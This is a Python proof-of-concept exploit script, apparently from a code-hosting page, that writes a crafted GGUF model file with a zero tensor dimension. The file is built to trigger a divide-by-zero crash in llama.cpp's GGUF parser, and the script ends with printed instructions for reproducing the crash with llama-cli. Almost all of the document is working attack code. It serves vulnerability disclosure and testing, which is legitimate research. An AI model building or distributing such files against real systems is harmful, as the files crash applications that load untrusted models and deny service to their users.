File size: 4,357 Bytes
243748f
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
#!/usr/bin/env python3
"""
PoC: Divide-by-zero in llama.cpp GGUF parser via zero tensor dimension.

Vulnerability: In ggml/src/gguf.cpp lines 550-552, the overflow check does:
    if (ok && ((INT64_MAX/info.t.ne[1] <= info.t.ne[0]) || ...))

The dimensions ne[0..3] are validated for < 0 at line 541 but NOT for == 0.
A dimension of 0 passes the < 0 check, then INT64_MAX / 0 triggers
undefined behavior (divide-by-zero crash / SIGFPE on most platforms).

Attack vector:
  - Craft a GGUF file with 1 tensor
  - Tensor has n_dims=2, ne[0]=32 (valid for F32 block size), ne[1]=0
  - ne[2] and ne[3] default to 1 (set at line 535)
  - The parser reads ne[0]=32, ne[1]=0, then at line 550:
      INT64_MAX / info.t.ne[1]  =>  INT64_MAX / 0  =>  CRASH

GGUF v3 binary format for tensor info:
  - name: string (uint64 length + chars)
  - n_dims: uint32
  - ne[0..n_dims-1]: int64 each
  - type: int32 (ggml_type)
  - offset: uint64
"""

import struct
import os

# GGUF constants
GGUF_MAGIC = b"GGUF"
GGUF_VERSION = 3
GGUF_TYPE_STRING = 8
GGUF_TYPE_UINT32 = 4

# ggml type constants
GGML_TYPE_F32 = 0


def write_string(f, s):
    """Write a GGUF string: uint64 length + chars (no null terminator)."""
    encoded = s.encode('utf-8')
    f.write(struct.pack('<Q', len(encoded)))
    f.write(encoded)


def write_kv_string(f, key, value):
    """Write a KV pair with string value."""
    write_string(f, key)                            # key
    f.write(struct.pack('<I', GGUF_TYPE_STRING))     # type = string
    write_string(f, value)                           # value


def create_divzero_gguf(output_path):
    """Create a GGUF file with a tensor whose ne[1]=0, triggering divide-by-zero."""

    n_tensors = 1
    n_kv = 1  # just general.architecture

    with open(output_path, 'wb') as f:
        # ===== GGUF Header =====
        f.write(GGUF_MAGIC)                           # magic: "GGUF"
        f.write(struct.pack('<I', GGUF_VERSION))       # version: 3
        f.write(struct.pack('<Q', n_tensors))          # n_tensors: 1
        f.write(struct.pack('<Q', n_kv))               # n_kv: 1

        # ===== KV Pairs =====
        write_kv_string(f, "general.architecture", "llama")

        # ===== Tensor Info =====
        # Tensor name
        write_string(f, "weight")

        # n_dims = 2 (so ne[0] and ne[1] are read from file; ne[2], ne[3] default to 1)
        f.write(struct.pack('<I', 2))

        # ne[0] = 32  (valid, non-zero, divisible by F32 block size of 1)
        f.write(struct.pack('<q', 32))

        # ne[1] = 0   <--- THIS IS THE TRIGGER
        # Passes the "< 0" check at line 541 (0 is not < 0)
        # Then at line 550: INT64_MAX / ne[1] = INT64_MAX / 0 => CRASH
        f.write(struct.pack('<q', 0))

        # Tensor type = GGML_TYPE_F32 (0)
        f.write(struct.pack('<i', GGML_TYPE_F32))

        # Tensor data offset within buffer (doesn't matter, we'll crash before using it)
        f.write(struct.pack('<Q', 0))

        # ===== Alignment padding + tensor data =====
        # The parser expects data after tensor info, aligned to GGUF_DEFAULT_ALIGNMENT (32).
        # We don't need actual tensor data since we crash during parsing, but include
        # a small amount to avoid premature EOF errors before hitting the vulnerable code.
        # Pad to 32-byte alignment
        current_pos = f.tell()
        alignment = 32
        padding_needed = (alignment - (current_pos % alignment)) % alignment
        f.write(b'\x00' * padding_needed)

        # Write minimal tensor "data" (32 floats * 0 rows = 0 bytes, but write something)
        # Actually, since we crash during gguf_init parsing, no data is needed.

    file_size = os.path.getsize(output_path)
    print(f"[*] Created: {output_path}")
    print(f"[*] File size: {file_size} bytes")
    print(f"[*] Tensor: name='weight', n_dims=2, ne=[32, 0, 1, 1], type=F32")
    print(f"[*] Vulnerability: INT64_MAX / ne[1] = INT64_MAX / 0 => divide-by-zero")
    print(f"[*]")
    print(f"[*] Test with:")
    print(f"[*]   ./llama-cli -m {output_path} -p 'hello'")
    print(f"[*] Expected: Floating point exception (SIGFPE) or crash")


if __name__ == "__main__":
    os.makedirs("/Users/eltarne/Documents/script/gguf_poc", exist_ok=True)
    output_path = "/Users/eltarne/Documents/script/gguf_poc/poc_divzero.gguf"
    create_divzero_gguf(output_path)